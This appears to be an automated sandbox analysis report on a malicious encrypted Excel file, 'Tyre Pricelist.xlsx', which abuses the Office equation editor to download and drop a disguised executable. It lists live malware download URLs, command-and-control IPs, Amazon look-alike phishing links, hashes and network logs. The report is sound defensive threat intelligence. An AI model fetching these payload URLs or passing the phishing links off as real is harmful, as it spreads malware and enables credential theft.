                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Z08LsyTAN6.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.189.164
                                                                                                                                                QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.123
                                                                                                                                                BCPL-SGBGPNETGlobalASNSGABSyodh8yx.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                tr2rgxBVl1.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                5kVcSS3v3q.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                VfXZcSLj.exeGet hashmaliciousBrowse
                                                                                                                                                • 14.128.35.30
                                                                                                                                                ORDERCONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.100.200
                                                                                                                                                Scan_PO238489923737483924.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.112.164
                                                                                                                                                Remittance Scan DOC-2029293#PI207-048.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.95.222
                                                                                                                                                PO8479349743085.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                PO#47974GH397.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                Maersk Kleven V949E.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                YDrnUOyMmD.exeGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                https://thehighestleveloftheworld.top/f862d13454fd267baa5fedfffb200567/signin.php?country=ZA-South%20Africa&lang=enGet hashmaliciousBrowse
                                                                                                                                                • 118.107.14.220
                                                                                                                                                https://www.amazon.co.jp.d13f0fed4d24d232f3c591.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.158
                                                                                                                                                https://amazon.account-update.amazon.co.jp.s8u913f0fed42f3c6a45b3.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.139
                                                                                                                                                http://down.idc3389.top/downloader.exeGet hashmaliciousBrowse
                                                                                                                                                • 116.193.154.122

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):599552
                                                                                                                                                Entropy (8bit):7.855744157979213
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
                                                                                                                                                MD5:429BBA6DBE159C300679509BE3085665
                                                                                                                                                SHA1:F79F58BC3142B59D0D8669595A01770BDF5486FF
                                                                                                                                                SHA-256:04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
                                                                                                                                                SHA-512:450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                Reputation:low
                                                                                                                                                IE Cache URL:http://workfinethdysanotherrainbowlomoyentthghf.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._.............................=... ...@....@.. ..............................U.....@..................................=..O....@..B....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...B....@....... ..............@..@.reloc.......`.......$..............@..B.................=......H........................q...+..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r?..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J
                                                                                                                                                C:\Users\user\Desktop\~$Tyre Pricelist.xlsx
                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.4377382811115937
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                C:\Users\Public\vbc.exe
                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):599552
                                                                                                                                                Entropy (8bit):7.855744157979213
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
                                                                                                                                                MD5:429BBA6DBE159C300679509BE3085665
                                                                                                                                                SHA1:F79F58BC3142B59D0D8669595A01770BDF5486FF
                                                                                                                                                SHA-256:04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
                                                                                                                                                SHA-512:450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._.............................=... ...@....@.. ..............................U.....@..................................=..O....@..B....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...B....@....... ..............@..@.reloc.......`.......$..............@..B.................=......H........................q...+..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r?..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:CDFV2 Encrypted
                                                                                                                                                Entropy (8bit):7.996727168383382
                                                                                                                                                TrID:
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                File name:Tyre Pricelist.xlsx
                                                                                                                                                File size:2481664
                                                                                                                                                MD5:3b5f7a2a0429e796040aa5bc3763a8fe
                                                                                                                                                SHA1:c049ac5a44d034995a55bd5f49aece9631c69c1f
                                                                                                                                                SHA256:9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
                                                                                                                                                SHA512:a345f1248ca41d2b88e05417c404ff3e57de909921b06a2543a79ef30ae62c1cfb5af2b5ba9ae13e2e500bb290951d3c356fe1b97990e32721b5093d6ea73766
                                                                                                                                                SSDEEP:49152:PYwpjAWZWQz/mAevYUEcg1udmyMc8gsD7iHqUg0hc:AwpsmswoVd3MCsD7iKAc
                                                                                                                                                File Content Preview:........................>...................&...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "Tyre Pricelist.xlsx"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:True
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:False

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:64
                                                                                                                                                Entropy:2.73637206947
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:112
                                                                                                                                                Entropy:2.7597816111
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:200
                                                                                                                                                Entropy:3.13335930328
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                General
                                                                                                                                                Stream Path:\x6DataSpaces/Version
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:76
                                                                                                                                                Entropy:2.79079600998
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                Stream Path: EncryptedPackage, File Type: PGP symmetric key encrypted data - Plaintext or unencrypted data, Stream Size: 2458264
                                                                                                                                                General
                                                                                                                                                Stream Path:EncryptedPackage
                                                                                                                                                File Type:PGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                                                                                Stream Size:2458264
                                                                                                                                                Entropy:7.99990874269
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . % . . . . . . . . . . . . . Q . . . . $ . 9 4 ' x . . . . W . D . g l . 5 M . F . . . . . > . . . . > . . M . . . k . W . . [ . . 9 . ? . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . . z . T . . . . . . | e . . g . .
                                                                                                                                                Data Raw:8c 82 25 00 00 00 00 00 b9 ec c5 18 bf 1c 1a c8 51 13 9d d1 05 24 bc 39 34 27 78 20 2e 15 0a aa 57 06 44 d5 67 6c dc 35 4d d2 46 ea ef a8 84 1e 3e 85 f1 fe 90 3e 81 8c 4d ac be e7 6b 8c 57 e8 d9 5b fd aa 39 f3 3f c9 e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08 7a 06 54 e3 a1 c4 c5 ee e3 7c 65 83 b7 67 93 08
                                                                                                                                                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                General
                                                                                                                                                Stream Path:EncryptionInfo
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:224
                                                                                                                                                Entropy:4.56052515619
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . f . ] . . . D . 7 . / & . X . l . . . E I ~ b . . . ! X . A . . . . t < . . . . . . x . . . A . l . . \\ . . @ . . . . . . . . x 6 .
                                                                                                                                                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                11/20/20-11:23:46.787297TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22103.125.191.5

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 20, 2020 11:23:46.567594051 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:46.786763906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:46.786992073 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:46.787297010 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.007692099 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007766008 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007797956 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007819891 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.007997990 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.008752108 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.226994991 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227062941 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227113008 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227163076 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227211952 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227252007 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227262020 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227289915 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227308989 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227329016 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227365017 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.227371931 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.227514982 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.445997953 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446053028 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446091890 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446130991 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446171045 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446212053 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446297884 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446327925 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446331978 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446343899 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446388960 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446409941 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446427107 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446475029 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446491003 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446517944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446538925 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446557999 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446576118 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446599960 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446603060 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.446691036 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446732044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.446768999 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.447190046 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.452023983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.452661991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665560961 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665719986 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665776968 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665783882 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665817976 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665822983 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665832996 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665863037 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665872097 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665910959 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665945053 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.665947914 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665977001 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.665980101 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666009903 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666014910 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666038036 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666048050 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666071892 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666081905 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666105032 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666117907 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666130066 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666160107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666160107 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666198015 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666212082 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666233063 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666237116 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666268110 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666281939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666301966 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666320086 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666336060 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666348934 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666371107 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666388988 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666405916 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666420937 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666449070 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666452885 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666487932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666501045 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666522026 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666527033 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666555882 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666568995 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666590929 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666610956 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666625023 CET8049165103.125.191.5192.168.2.22

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 20, 2020 11:23:46.500763893 CET5219753192.168.2.228.8.8.8
                                                                                                                                                Nov 20, 2020 11:23:46.550245047 CET53521978.8.8.8192.168.2.22
                                                                                                                                                Nov 20, 2020 11:24:55.833583117 CET5309953192.168.2.228.8.8.8
                                                                                                                                                Nov 20, 2020 11:24:55.879791975 CET53530998.8.8.8192.168.2.22
                                                                                                                                                Nov 20, 2020 11:25:16.152932882 CET5283853192.168.2.228.8.8.8
                                                                                                                                                Nov 20, 2020 11:25:16.491955996 CET53528388.8.8.8192.168.2.22

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Nov 20, 2020 11:23:46.500763893 CET192.168.2.228.8.8.80x8ac6Standard query (0)workfinethdysanotherrainbowlomoyentthghf.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:24:55.833583117 CET192.168.2.228.8.8.80xa14dStandard query (0)www.pestigenix.comA (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:25:16.152932882 CET192.168.2.228.8.8.80xccffStandard query (0)www.atlanticdentallab.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Nov 20, 2020 11:23:46.550245047 CET8.8.8.8192.168.2.220x8ac6No error (0)workfinethdysanotherrainbowlomoyentthghf.ydns.eu103.125.191.5A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:24:55.879791975 CET8.8.8.8192.168.2.220xa14dNo error (0)www.pestigenix.com91.195.241.137A (IP address)IN (0x0001)
                                                                                                                                                Nov 20, 2020 11:25:16.491955996 CET8.8.8.8192.168.2.220xccffNo error (0)www.atlanticdentallab.com180.215.92.80A (IP address)IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • workfinethdysanotherrainbowlomoyentthghf.ydns.eu
                                                                                                                                                • www.pestigenix.com
                                                                                                                                                • www.atlanticdentallab.com

                                                                                                                                                HTTP Packets

